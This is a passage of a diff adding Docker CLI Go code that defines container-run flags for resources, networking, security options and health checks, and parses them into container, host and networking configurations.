int64 + cpuRealtimePeriod int64 + cpuRealtimeRuntime int64 + cpuQuota int64 + cpus opts.NanoCPUs + cpusetCpus string + cpusetMems string + blkioWeight uint16 + ioMaxBandwidth string + ioMaxIOps uint64 + swappiness int64 + netMode string + macAddress string + ipv4Address string + ipv6Address string + ipcMode string + pidsLimit int64 + restartPolicy string + readonlyRootfs bool + loggingDriver string + cgroupParent string + volumeDriver string + stopSignal string + stopTimeout int + isolation string + shmSize string + noHealthcheck bool + healthCmd string + healthInterval time.Duration + healthTimeout time.Duration + healthRetries int + runtime string + autoRemove bool + init bool + initPath string + credentialSpec string + + Image string + Args []string +} + +// AddFlags adds all command line flags that will be used by Parse to the FlagSet +func AddFlags(flags *pflag.FlagSet) *ContainerOptions { + copts := &ContainerOptions{ + aliases: opts.NewListOpts(nil), + attach: opts.NewListOpts(ValidateAttach), + blkioWeightDevice: NewWeightdeviceOpt(ValidateWeightDevice), + capAdd: opts.NewListOpts(nil), + capDrop: opts.NewListOpts(nil), + dns: opts.NewListOpts(opts.ValidateIPAddress), + dnsOptions: opts.NewListOpts(nil), + dnsSearch: opts.NewListOpts(opts.ValidateDNSSearch), + deviceReadBps: NewThrottledeviceOpt(ValidateThrottleBpsDevice), + deviceReadIOps: NewThrottledeviceOpt(ValidateThrottleIOpsDevice), + deviceWriteBps: NewThrottledeviceOpt(ValidateThrottleBpsDevice), + deviceWriteIOps: NewThrottledeviceOpt(ValidateThrottleIOpsDevice), + devices: opts.NewListOpts(ValidateDevice), + env: opts.NewListOpts(ValidateEnv), + envFile: opts.NewListOpts(nil), + expose: opts.NewListOpts(nil), + extraHosts: opts.NewListOpts(ValidateExtraHost), + groupAdd: opts.NewListOpts(nil), + labels: opts.NewListOpts(ValidateEnv), + labelsFile: opts.NewListOpts(nil), + linkLocalIPs: opts.NewListOpts(nil), + links: opts.NewListOpts(ValidateLink), + loggingOpts: opts.NewListOpts(nil), + publish: 
opts.NewListOpts(nil), + securityOpt: opts.NewListOpts(nil), + storageOpt: opts.NewListOpts(nil), + sysctls: opts.NewMapOpts(nil, opts.ValidateSysctl), + tmpfs: opts.NewListOpts(nil), + ulimits: NewUlimitOpt(nil), + volumes: opts.NewListOpts(nil), + volumesFrom: opts.NewListOpts(nil), + } + + // General purpose flags + flags.VarP(&copts.attach, "attach", "a", "Attach to STDIN, STDOUT or STDERR") + flags.Var(&copts.devices, "device", "Add a host device to the container") + flags.VarP(&copts.env, "env", "e", "Set environment variables") + flags.Var(&copts.envFile, "env-file", "Read in a file of environment variables") + flags.StringVar(&copts.entrypoint, "entrypoint", "", "Overwrite the default ENTRYPOINT of the image") + flags.Var(&copts.groupAdd, "group-add", "Add additional groups to join") + flags.StringVarP(&copts.hostname, "hostname", "h", "", "Container host name") + flags.BoolVarP(&copts.stdin, "interactive", "i", false, "Keep STDIN open even if not attached") + flags.VarP(&copts.labels, "label", "l", "Set meta data on a container") + flags.Var(&copts.labelsFile, "label-file", "Read in a line delimited file of labels") + flags.BoolVar(&copts.readonlyRootfs, "read-only", false, "Mount the container's root filesystem as read only") + flags.StringVar(&copts.restartPolicy, "restart", "no", "Restart policy to apply when a container exits") + flags.StringVar(&copts.stopSignal, "stop-signal", signal.DefaultStopSignal, fmt.Sprintf("Signal to stop a container, %v by default", signal.DefaultStopSignal)) + flags.IntVar(&copts.stopTimeout, "stop-timeout", 0, "Timeout (in seconds) to stop a container") + flags.SetAnnotation("stop-timeout", "version", []string{"1.25"}) + flags.Var(copts.sysctls, "sysctl", "Sysctl options") + flags.BoolVarP(&copts.tty, "tty", "t", false, "Allocate a pseudo-TTY") + flags.Var(copts.ulimits, "ulimit", "Ulimit options") + flags.StringVarP(&copts.user, "user", "u", "", "Username or UID (format: [:])") + flags.StringVarP(&copts.workingDir, 
"workdir", "w", "", "Working directory inside the container") + flags.BoolVar(&copts.autoRemove, "rm", false, "Automatically remove the container when it exits") + + // Security + flags.Var(&copts.capAdd, "cap-add", "Add Linux capabilities") + flags.Var(&copts.capDrop, "cap-drop", "Drop Linux capabilities") + flags.BoolVar(&copts.privileged, "privileged", false, "Give extended privileges to this container") + flags.Var(&copts.securityOpt, "security-opt", "Security Options") + flags.StringVar(&copts.usernsMode, "userns", "", "User namespace to use") + flags.StringVar(&copts.credentialSpec, "credentialspec", "", "Credential spec for managed service account (Windows only)") + + // Network and port publishing flag + flags.Var(&copts.extraHosts, "add-host", "Add a custom host-to-IP mapping (host:ip)") + flags.Var(&copts.dns, "dns", "Set custom DNS servers") + // We allow for both "--dns-opt" and "--dns-option", although the latter is the recommended way. + // This is to be consistent with service create/update + flags.Var(&copts.dnsOptions, "dns-opt", "Set DNS options") + flags.Var(&copts.dnsOptions, "dns-option", "Set DNS options") + flags.MarkHidden("dns-opt") + flags.Var(&copts.dnsSearch, "dns-search", "Set custom DNS search domains") + flags.Var(&copts.expose, "expose", "Expose a port or a range of ports") + flags.StringVar(&copts.ipv4Address, "ip", "", "Container IPv4 address (e.g. 172.30.100.104)") + flags.StringVar(&copts.ipv6Address, "ip6", "", "Container IPv6 address (e.g. 2001:db8::33)") + flags.Var(&copts.links, "link", "Add link to another container") + flags.Var(&copts.linkLocalIPs, "link-local-ip", "Container IPv4/IPv6 link-local addresses") + flags.StringVar(&copts.macAddress, "mac-address", "", "Container MAC address (e.g. 
92:d0:c6:0a:29:33)") + flags.VarP(&copts.publish, "publish", "p", "Publish a container's port(s) to the host") + flags.BoolVarP(&copts.publishAll, "publish-all", "P", false, "Publish all exposed ports to random ports") + // We allow for both "--net" and "--network", although the latter is the recommended way. + flags.StringVar(&copts.netMode, "net", "default", "Connect a container to a network") + flags.StringVar(&copts.netMode, "network", "default", "Connect a container to a network") + flags.MarkHidden("net") + // We allow for both "--net-alias" and "--network-alias", although the latter is the recommended way. + flags.Var(&copts.aliases, "net-alias", "Add network-scoped alias for the container") + flags.Var(&copts.aliases, "network-alias", "Add network-scoped alias for the container") + flags.MarkHidden("net-alias") + + // Logging and storage + flags.StringVar(&copts.loggingDriver, "log-driver", "", "Logging driver for the container") + flags.StringVar(&copts.volumeDriver, "volume-driver", "", "Optional volume driver for the container") + flags.Var(&copts.loggingOpts, "log-opt", "Log driver options") + flags.Var(&copts.storageOpt, "storage-opt", "Storage driver options for the container") + flags.Var(&copts.tmpfs, "tmpfs", "Mount a tmpfs directory") + flags.Var(&copts.volumesFrom, "volumes-from", "Mount volumes from the specified container(s)") + flags.VarP(&copts.volumes, "volume", "v", "Bind mount a volume") + + // Health-checking + flags.StringVar(&copts.healthCmd, "health-cmd", "", "Command to run to check health") + flags.DurationVar(&copts.healthInterval, "health-interval", 0, "Time between running the check (ns|us|ms|s|m|h) (default 0s)") + flags.IntVar(&copts.healthRetries, "health-retries", 0, "Consecutive failures needed to report unhealthy") + flags.DurationVar(&copts.healthTimeout, "health-timeout", 0, "Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)") + flags.BoolVar(&copts.noHealthcheck, "no-healthcheck", false, "Disable any 
container-specified HEALTHCHECK") + + // Resource management + flags.Uint16Var(&copts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)") + flags.Var(&copts.blkioWeightDevice, "blkio-weight-device", "Block IO weight (relative device weight)") + flags.StringVar(&copts.containerIDFile, "cidfile", "", "Write the container ID to the file") + flags.StringVar(&copts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") + flags.StringVar(&copts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") + flags.Int64Var(&copts.cpuCount, "cpu-count", 0, "CPU count (Windows only)") + flags.Int64Var(&copts.cpuPercent, "cpu-percent", 0, "CPU percent (Windows only)") + flags.Int64Var(&copts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period") + flags.Int64Var(&copts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota") + flags.Int64Var(&copts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit CPU real-time period in microseconds") + flags.Int64Var(&copts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit CPU real-time runtime in microseconds") + flags.Int64VarP(&copts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") + flags.Var(&copts.cpus, "cpus", "Number of CPUs") + flags.Var(&copts.deviceReadBps, "device-read-bps", "Limit read rate (bytes per second) from a device") + flags.Var(&copts.deviceReadIOps, "device-read-iops", "Limit read rate (IO per second) from a device") + flags.Var(&copts.deviceWriteBps, "device-write-bps", "Limit write rate (bytes per second) to a device") + flags.Var(&copts.deviceWriteIOps, "device-write-iops", "Limit write rate (IO per second) to a device") + flags.StringVar(&copts.ioMaxBandwidth, "io-maxbandwidth", "", "Maximum IO bandwidth limit for the system drive (Windows only)") + flags.Uint64Var(&copts.ioMaxIOps, "io-maxiops", 0, "Maximum IOps limit for the system drive (Windows only)") + 
flags.StringVar(&copts.kernelMemory, "kernel-memory", "", "Kernel memory limit") + flags.StringVarP(&copts.memoryString, "memory", "m", "", "Memory limit") + flags.StringVar(&copts.memoryReservation, "memory-reservation", "", "Memory soft limit") + flags.StringVar(&copts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") + flags.Int64Var(&copts.swappiness, "memory-swappiness", -1, "Tune container memory swappiness (0 to 100)") + flags.BoolVar(&copts.oomKillDisable, "oom-kill-disable", false, "Disable OOM Killer") + flags.IntVar(&copts.oomScoreAdj, "oom-score-adj", 0, "Tune host's OOM preferences (-1000 to 1000)") + flags.Int64Var(&copts.pidsLimit, "pids-limit", 0, "Tune container pids limit (set -1 for unlimited)") + + // Low-level execution (cgroups, namespaces, ...) + flags.StringVar(&copts.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container") + flags.StringVar(&copts.ipcMode, "ipc", "", "IPC namespace to use") + flags.StringVar(&copts.isolation, "isolation", "", "Container isolation technology") + flags.StringVar(&copts.pidMode, "pid", "", "PID namespace to use") + flags.StringVar(&copts.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB") + flags.StringVar(&copts.utsMode, "uts", "", "UTS namespace to use") + flags.StringVar(&copts.runtime, "runtime", "", "Runtime to use for this container") + + flags.BoolVar(&copts.init, "init", false, "Run an init inside the container that forwards signals and reaps processes") + flags.StringVar(&copts.initPath, "init-path", "", "Path to the docker-init binary") + return copts +} + +// Parse parses the args for the specified command and generates a Config, +// a HostConfig and returns them with the specified command. +// If the specified args are not valid, it will return an error. 
+func Parse(flags *pflag.FlagSet, copts *ContainerOptions) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + var ( + attachStdin = copts.attach.Get("stdin") + attachStdout = copts.attach.Get("stdout") + attachStderr = copts.attach.Get("stderr") + ) + + // Validate the input mac address + if copts.macAddress != "" { + if _, err := ValidateMACAddress(copts.macAddress); err != nil { + return nil, nil, nil, fmt.Errorf("%s is not a valid mac address", copts.macAddress) + } + } + if copts.stdin { + attachStdin = true + } + // If -a is not set, attach to stdout and stderr + if copts.attach.Len() == 0 { + attachStdout = true + attachStderr = true + } + + var err error + + var memory int64 + if copts.memoryString != "" { + memory, err = units.RAMInBytes(copts.memoryString) + if err != nil { + return nil, nil, nil, err + } + } + + var memoryReservation int64 + if copts.memoryReservation != "" { + memoryReservation, err = units.RAMInBytes(copts.memoryReservation) + if err != nil { + return nil, nil, nil, err + } + } + + var memorySwap int64 + if copts.memorySwap != "" { + if copts.memorySwap == "-1" { + memorySwap = -1 + } else { + memorySwap, err = units.RAMInBytes(copts.memorySwap) + if err != nil { + return nil, nil, nil, err + } + } + } + + var kernelMemory int64 + if copts.kernelMemory != "" { + kernelMemory, err = units.RAMInBytes(copts.kernelMemory) + if err != nil { + return nil, nil, nil, err + } + } + + swappiness := copts.swappiness + if swappiness != -1 && (swappiness < 0 || swappiness > 100) { + return nil, nil, nil, fmt.Errorf("invalid value: %d. 
Valid memory swappiness range is 0-100", swappiness) + } + + var shmSize int64 + if copts.shmSize != "" { + shmSize, err = units.RAMInBytes(copts.shmSize) + if err != nil { + return nil, nil, nil, err + } + } + + // TODO FIXME units.RAMInBytes should have a uint64 version + var maxIOBandwidth int64 + if copts.ioMaxBandwidth != "" { + maxIOBandwidth, err = units.RAMInBytes(copts.ioMaxBandwidth) + if err != nil { + return nil, nil, nil, err + } + if maxIOBandwidth < 0 { + return nil, nil, nil, fmt.Errorf("invalid value: %s. Maximum IO Bandwidth must be positive", copts.ioMaxBandwidth) + } + } + + var binds []string + volumes := copts.volumes.GetMap() + // add any bind targets to the list of container volumes + for bind := range copts.volumes.GetMap() { + if arr := volumeSplitN(bind, 2); len(arr) > 1 { + // after creating the bind mount we want to delete it from the copts.volumes values because + // we do not want bind mounts being committed to image configs + binds = append(binds, bind) + // We should delete from the map (`volumes`) here, as deleting from copts.volumes will not work if + // there are duplicates entries. 
+ delete(volumes, bind) + } + } + + // Can't evaluate options passed into --tmpfs until we actually mount + tmpfs := make(map[string]string) + for _, t := range copts.tmpfs.GetAll() { + if arr := strings.SplitN(t, ":", 2); len(arr) > 1 { + tmpfs[arr[0]] = arr[1] + } else { + tmpfs[arr[0]] = "" + } + } + + var ( + runCmd strslice.StrSlice + entrypoint strslice.StrSlice + ) + + if len(copts.Args) > 0 { + runCmd = strslice.StrSlice(copts.Args) + } + + if copts.entrypoint != "" { + entrypoint = strslice.StrSlice{copts.entrypoint} + } else if flags.Changed("entrypoint") { + // if `--entrypoint=` is parsed then Entrypoint is reset + entrypoint = []string{""} + } + + ports, portBindings, err := nat.ParsePortSpecs(copts.publish.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + // Merge in exposed ports to the map of published ports + for _, e := range copts.expose.GetAll() { + if strings.Contains(e, ":") { + return nil, nil, nil, fmt.Errorf("invalid port format for --expose: %s", e) + } + //support two formats for expose, original format /[] or /[] + proto, port := nat.SplitProtoPort(e) + //parse the start and end port and create a sequence of ports to expose + //if expose a port, the start and end port are the same + start, end, err := nat.ParsePortRange(port) + if err != nil { + return nil, nil, nil, fmt.Errorf("invalid range format for --expose: %s, error: %s", e, err) + } + for i := start; i <= end; i++ { + p, err := nat.NewPort(proto, strconv.FormatUint(i, 10)) + if err != nil { + return nil, nil, nil, err + } + if _, exists := ports[p]; !exists { + ports[p] = struct{}{} + } + } + } + + // parse device mappings + deviceMappings := []container.DeviceMapping{} + for _, device := range copts.devices.GetAll() { + deviceMapping, err := ParseDevice(device) + if err != nil { + return nil, nil, nil, err + } + deviceMappings = append(deviceMappings, deviceMapping) + } + + // collect all the environment variables for the container + envVariables, err := 
ReadKVStrings(copts.envFile.GetAll(), copts.env.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + // collect all the labels for the container + labels, err := ReadKVStrings(copts.labelsFile.GetAll(), copts.labels.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + ipcMode := container.IpcMode(copts.ipcMode) + if !ipcMode.Valid() { + return nil, nil, nil, fmt.Errorf("--ipc: invalid IPC mode") + } + + pidMode := container.PidMode(copts.pidMode) + if !pidMode.Valid() { + return nil, nil, nil, fmt.Errorf("--pid: invalid PID mode") + } + + utsMode := container.UTSMode(copts.utsMode) + if !utsMode.Valid() { + return nil, nil, nil, fmt.Errorf("--uts: invalid UTS mode") + } + + usernsMode := container.UsernsMode(copts.usernsMode) + if !usernsMode.Valid() { + return nil, nil, nil, fmt.Errorf("--userns: invalid USER mode") + } + + restartPolicy, err := ParseRestartPolicy(copts.restartPolicy) + if err != nil { + return nil, nil, nil, err + } + + loggingOpts, err := parseLoggingOpts(copts.loggingDriver, copts.loggingOpts.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + securityOpts, err := parseSecurityOpts(copts.securityOpt.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + storageOpts, err := parseStorageOpts(copts.storageOpt.GetAll()) + if err != nil { + return nil, nil, nil, err + } + + // Healthcheck + var healthConfig *container.HealthConfig + haveHealthSettings := copts.healthCmd != "" || + copts.healthInterval != 0 || + copts.healthTimeout != 0 || + copts.healthRetries != 0 + if copts.noHealthcheck { + if haveHealthSettings { + return nil, nil, nil, fmt.Errorf("--no-healthcheck conflicts with --health-* options") + } + test := strslice.StrSlice{"NONE"} + healthConfig = &container.HealthConfig{Test: test} + } else if haveHealthSettings { + var probe strslice.StrSlice + if copts.healthCmd != "" { + args := []string{"CMD-SHELL", copts.healthCmd} + probe = strslice.StrSlice(args) + } + if copts.healthInterval < 0 { + 
return nil, nil, nil, fmt.Errorf("--health-interval cannot be negative") + } + if copts.healthTimeout < 0 { + return nil, nil, nil, fmt.Errorf("--health-timeout cannot be negative") + } + + healthConfig = &container.HealthConfig{ + Test: probe, + Interval: copts.healthInterval, + Timeout: copts.healthTimeout, + Retries: copts.healthRetries, + } + } + + resources := container.Resources{ + CgroupParent: copts.cgroupParent, + Memory: memory, + MemoryReservation: memoryReservation, + MemorySwap: memorySwap, + MemorySwappiness: &copts.swappiness, + KernelMemory: kernelMemory, + OomKillDisable: &copts.oomKillDisable, + NanoCPUs: copts.cpus.Value(), + CPUCount: copts.cpuCount, + CPUPercent: copts.cpuPercent, + CPUShares: copts.cpuShares, + CPUPeriod: copts.cpuPeriod, + CpusetCpus: copts.cpusetCpus, + CpusetMems: copts.cpusetMems, + CPUQuota: copts.cpuQuota, + CPURealtimePeriod: copts.cpuRealtimePeriod, + CPURealtimeRuntime: copts.cpuRealtimeRuntime, + PidsLimit: copts.pidsLimit, + BlkioWeight: copts.blkioWeight, + BlkioWeightDevice: copts.blkioWeightDevice.GetList(), + BlkioDeviceReadBps: copts.deviceReadBps.GetList(), + BlkioDeviceWriteBps: copts.deviceWriteBps.GetList(), + BlkioDeviceReadIOps: copts.deviceReadIOps.GetList(), + BlkioDeviceWriteIOps: copts.deviceWriteIOps.GetList(), + IOMaximumIOps: copts.ioMaxIOps, + IOMaximumBandwidth: uint64(maxIOBandwidth), + Ulimits: copts.ulimits.GetList(), + Devices: deviceMappings, + } + + config := &container.Config{ + Hostname: copts.hostname, + ExposedPorts: ports, + User: copts.user, + Tty: copts.tty, + // TODO: deprecated, it comes from -n, --networking + // it's still needed internally to set the network to disabled + // if e.g. 
bridge is none in daemon opts, and in inspect + NetworkDisabled: false, + OpenStdin: copts.stdin, + AttachStdin: attachStdin, + AttachStdout: attachStdout, + AttachStderr: attachStderr, + Env: envVariables, + Cmd: runCmd, + Image: copts.Image, + Volumes: volumes, + MacAddress: copts.macAddress, + Entrypoint: entrypoint, + WorkingDir: copts.workingDir, + Labels: ConvertKVStringsToMap(labels), + Healthcheck: healthConfig, + } + if flags.Changed("stop-signal") { + config.StopSignal = copts.stopSignal + } + if flags.Changed("stop-timeout") { + config.StopTimeout = &copts.stopTimeout + } + + hostConfig := &container.HostConfig{ + Binds: binds, + ContainerIDFile: copts.containerIDFile, + OomScoreAdj: copts.oomScoreAdj, + AutoRemove: copts.autoRemove, + Privileged: copts.privileged, + PortBindings: portBindings, + Links: copts.links.GetAll(), + PublishAllPorts: copts.publishAll, + // Make sure the dns fields are never nil. + // New containers don't ever have those fields nil, + // but pre created containers can still have those nil values. + // See https://github.com/docker/docker/pull/17779 + // for a more detailed explanation on why we don't want that. 
+ DNS: copts.dns.GetAllOrEmpty(), + DNSSearch: copts.dnsSearch.GetAllOrEmpty(), + DNSOptions: copts.dnsOptions.GetAllOrEmpty(), + ExtraHosts: copts.extraHosts.GetAll(), + VolumesFrom: copts.volumesFrom.GetAll(), + NetworkMode: container.NetworkMode(copts.netMode), + IpcMode: ipcMode, + PidMode: pidMode, + UTSMode: utsMode, + UsernsMode: usernsMode, + CapAdd: strslice.StrSlice(copts.capAdd.GetAll()), + CapDrop: strslice.StrSlice(copts.capDrop.GetAll()), + GroupAdd: copts.groupAdd.GetAll(), + RestartPolicy: restartPolicy, + SecurityOpt: securityOpts, + StorageOpt: storageOpts, + ReadonlyRootfs: copts.readonlyRootfs, + LogConfig: container.LogConfig{Type: copts.loggingDriver, Config: loggingOpts}, + VolumeDriver: copts.volumeDriver, + Isolation: container.Isolation(copts.isolation), + ShmSize: shmSize, + Resources: resources, + Tmpfs: tmpfs, + Sysctls: copts.sysctls.GetAll(), + Runtime: copts.runtime, + } + + // only set this value if the user provided the flag, else it should default to nil + if flags.Changed("init") { + hostConfig.Init = &copts.init + } + + // When allocating stdin in attached mode, close stdin at client disconnect + if config.OpenStdin && config.AttachStdin { + config.StdinOnce = true + } + + networkingConfig := &networktypes.NetworkingConfig{ + EndpointsConfig: make(map[string]*networktypes.EndpointSettings), + } + + if copts.ipv4Address != "" || copts.ipv6Address != "" || copts.linkLocalIPs.Len() > 0 { + epConfig := &networktypes.EndpointSettings{} + networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig + + epConfig.IPAMConfig = &networktypes.EndpointIPAMConfig{ + IPv4Address: copts.ipv4Address, + IPv6Address: copts.ipv6Address, + } + + if copts.linkLocalIPs.Len() > 0 { + epConfig.IPAMConfig.LinkLocalIPs = make([]string, copts.linkLocalIPs.Len()) + copy(epConfig.IPAMConfig.LinkLocalIPs, copts.linkLocalIPs.GetAll()) + } + } + + if hostConfig.NetworkMode.IsUserDefined() && len(hostConfig.Links) > 0 { + epConfig := 
networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] + if epConfig == nil { + epConfig = &networktypes.EndpointSettings{} + } + epConfig.Links = make([]string, len(hostConfig.Links)) + copy(epConfig.Links, hostConfig.Links) + networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig + } + + if copts.aliases.Len() > 0 { + epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] + if epConfig == nil { + epConfig = &networktypes.EndpointSettings{} + } + epConfig.Aliases = make([]string, copts.aliases.Len()) + copy(epConfig.Aliases, copts.aliases.GetAll()) + networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig + } + + return config, hostConfig, networkingConfig, nil +} + +// ReadKVStrings reads a file of line terminated key=value pairs, and overrides any keys +// present in the file with additional pairs specified in the override parameter +func ReadKVStrings(files []string, override []string) ([]string, error) { + envVariables := []string{} + for _, ef := range files { + parsedVars, err := ParseEnvFile(ef) + if err != nil { + return nil, err + } + envVariables = append(envVariables, parsedVars...) + } + // parse the '-e' and '--env' after, to allow override + envVariables = append(envVariables, override...) + + return envVariables, nil +} + +// ConvertKVStringsToMap converts ["key=value"] to {"key":"value"} +func ConvertKVStringsToMap(values []string) map[string]string { + result := make(map[string]string, len(values)) + for _, value := range values { + kv := strings.SplitN(value, "=", 2) + if len(kv) == 1 { + result[kv[0]] = "" + } else { + result[kv[0]] = kv[1] + } + } + + return result +} + +// ConvertKVStringsToMapWithNil converts ["key=value"] to {"key":"value"} +// but set unset keys to nil - meaning the ones with no "=" in them. 
+// We use this in cases where we need to distinguish between +// FOO= and FOO +// where the latter case just means FOO was mentioned but not given a value +func ConvertKVStringsToMapWithNil(values []string) map[string]*string { + result := make(map[string]*string, len(values)) + for _, value := range values { + kv := strings.SplitN(value, "=", 2) + if len(kv) == 1 { + result[kv[0]] = nil + } else { + result[kv[0]] = &kv[1] + } + } + + return result +} + +func parseLoggingOpts(loggingDriver string, loggingOpts []string) (map[string]string, error) { + loggingOptsMap := ConvertKVStringsToMap(loggingOpts) + if loggingDriver == "none" && len(loggingOpts) > 0 { + return map[string]string{}, fmt.Errorf("invalid logging opts for driver %s", loggingDriver) + } + return loggingOptsMap, nil +} + +// takes a local seccomp daemon, reads the file contents for sending to the daemon +func parseSecurityOpts(securityOpts []string) ([]string, error) { + for key, opt := range securityOpts { + con := strings.SplitN(opt, "=", 2) + if len(con) == 1 && con[0] != "no-new-privileges" { + if strings.Contains(opt, ":") { + con = strings.SplitN(opt, ":", 2) + } else { + return securityOpts, fmt.Errorf("Invalid --security-opt: %q", opt) + } + } + if con[0] == "seccomp" && con[1] != "unconfined" { + f, err := ioutil.ReadFile(con[1]) + if err != nil { + return securityOpts, fmt.Errorf("opening seccomp profile (%s) failed: %v", con[1], err) + } + b := bytes.NewBuffer(nil) + if err := json.Compact(b, f); err != nil { + return securityOpts, fmt.Errorf("compacting json for seccomp profile (%s) failed: %v", con[1], err) + } + securityOpts[key] = fmt.Sprintf("seccomp=%s", b.Bytes()) + } + } + + return securityOpts, nil +} + +// parses storage options per container into a map +func parseStorageOpts(storageOpts []string) (map[string]string, error) { + m := make(map[string]string) + for _, option := range storageOpts { + if strings.Contains(option, "=") { + opt := strings.SplitN(option, "=", 2) + 
m[opt[0]] = opt[1] + } else { + return nil, fmt.Errorf("invalid storage option") + } + } + return m, nil +} + +// ParseRestartPolicy returns the parsed policy or an error indicating what is incorrect +func ParseRestartPolicy(policy string) (container.RestartPolicy, error) { + p := container.RestartPolicy{} + + if policy == "" { + return p, nil + } + + parts := strings.Split(policy, ":") + + if len(parts) > 2 { + return p, fmt.Errorf("invalid restart policy format") + } + if len(parts) == 2 { + count, err := strconv.Atoi(parts[1]) + if err != nil { + return p, fmt.Errorf("maximum retry count must be an integer") + } + + p.MaximumRetryCount = count + } + + p.Name = parts[0] + + return p, nil +} + +// ParseDevice parses a device mapping string to a container.DeviceMapping struct +func ParseDevice(device string) (container.DeviceMapping, error) { + src := "" + dst := "" + permissions := "rwm" + arr := strings.Split(device, ":") + switch len(arr) { + case 3: + permissions = arr[2] + fallthrough + case 2: + if ValidDeviceMode(arr[1]) { + permissions = arr[1] + } else { + dst = arr[1] + } + fallthrough + case 1: + src = arr[0] + default: + return container.DeviceMapping{}, fmt.Errorf("invalid device specification: %s", device) + } + + if dst == "" { + dst = src + } + + deviceMapping := container.DeviceMapping{ + PathOnHost: src, + PathInContainer: dst, + CgroupPermissions: permissions, + } + return deviceMapping, nil +} + +// ParseLink parses and validates the specified string as a link format (name:alias) +func ParseLink(val string) (string, string, error) { + if val == "" { + return "", "", fmt.Errorf("empty string specified for links") + } + arr := strings.Split(val, ":") + if len(arr) > 2 { + return "", "", fmt.Errorf("bad format for links: %s", val) + } + if len(arr) == 1 { + return val, val, nil + } + // This is kept because we can actually get a HostConfig with links + // from an already created container and the format is not `foo:bar` + // but `/foo:/c1/bar` + if 
strings.HasPrefix(arr[0], "/") { + _, alias := path.Split(arr[1]) + return arr[0][1:], alias, nil + } + return arr[0], arr[1], nil +} + +// ValidateLink validates that the specified string has a valid link format (containerName:alias). +func ValidateLink(val string) (string, error) { + if _, _, err := ParseLink(val); err != nil { + return val, err + } + return val, nil +} + +// ValidDeviceMode checks if the mode for device is valid or not. +// Valid mode is a composition of r (read), w (write), and m (mknod). +func ValidDeviceMode(mode string) bool { + var legalDeviceMode = map[rune]bool{ + 'r': true, + 'w': true, + 'm': true, + } + if mode == "" { + return false + } + for _, c := range mode { + if !legalDeviceMode[c] { + return false + } + legalDeviceMode[c] = false + } + return true +} + +// ValidateDevice validates a path for devices +// It will make sure 'val' is in the form: +// [host-dir:]container-path[:mode] +// It also validates the device mode. +func ValidateDevice(val string) (string, error) { + return validatePath(val, ValidDeviceMode) +} + +func validatePath(val string, validator func(string) bool) (string, error) { + var containerPath string + var mode string + + if strings.Count(val, ":") > 2 { + return val, fmt.Errorf("bad format for path: %s", val) + } + + split := strings.SplitN(val, ":", 3) + if split[0] == "" { + return val, fmt.Errorf("bad format for path: %s", val) + } + switch len(split) { + case 1: + containerPath = split[0] + val = path.Clean(containerPath) + case 2: + if isValid := validator(split[1]); isValid { + containerPath = split[0] + mode = split[1] + val = fmt.Sprintf("%s:%s", path.Clean(containerPath), mode) + } else { + containerPath = split[1] + val = fmt.Sprintf("%s:%s", split[0], path.Clean(containerPath)) + } + case 3: + containerPath = split[1] + mode = split[2] + if isValid := validator(split[2]); !isValid { + return val, fmt.Errorf("bad mode specified: %s", mode) + } + val = fmt.Sprintf("%s:%s:%s", split[0], containerPath, 
mode) + } + + if !path.IsAbs(containerPath) { + return val, fmt.Errorf("%s is not an absolute path", containerPath) + } + return val, nil +} + +// volumeSplitN splits raw into a maximum of n parts, separated by a separator colon. +// A separator colon is the last `:` character in the regex `[:\\]?[a-zA-Z]:` (note `\\` is `\` escaped). +// In Windows driver letter appears in two situations: +// a. `^[a-zA-Z]:` (A colon followed by `^[a-zA-Z]:` is OK as colon is the separator in volume option) +// b. A string in the format like `\\?\C:\Windows\...` (UNC). +// Therefore, a driver letter can only follow either a `:` or `\\` +// This allows to correctly split strings such as `C:\foo:D:\:rw` or `/tmp/q:/foo`. +func volumeSplitN(raw string, n int) []string { + var array []string + if len(raw) == 0 || raw[0] == ':' { + // invalid + return nil + } + // numberOfParts counts the number of parts separated by a separator colon + numberOfParts := 0 + // left represents the left-most cursor in raw, updated at every `:` character considered as a separator. + left := 0 + // right represents the right-most cursor in raw incremented with the loop. Note this + // starts at index 1 as index 0 is already handle above as a special case. + for right := 1; right < len(raw); right++ { + // stop parsing if reached maximum number of parts + if n >= 0 && numberOfParts >= n { + break + } + if raw[right] != ':' { + continue + } + potentialDriveLetter := raw[right-1] + if (potentialDriveLetter >= 'A' && potentialDriveLetter <= 'Z') || (potentialDriveLetter >= 'a' && potentialDriveLetter <= 'z') { + if right > 1 { + beforePotentialDriveLetter := raw[right-2] + // Only `:` or `\\` are checked (`/` could fall into the case of `/tmp/q:/foo`) + if beforePotentialDriveLetter != ':' && beforePotentialDriveLetter != '\\' { + // e.g. `C:` is not preceded by any delimiter, therefore it was not a drive letter but a path ending with `C:`. 
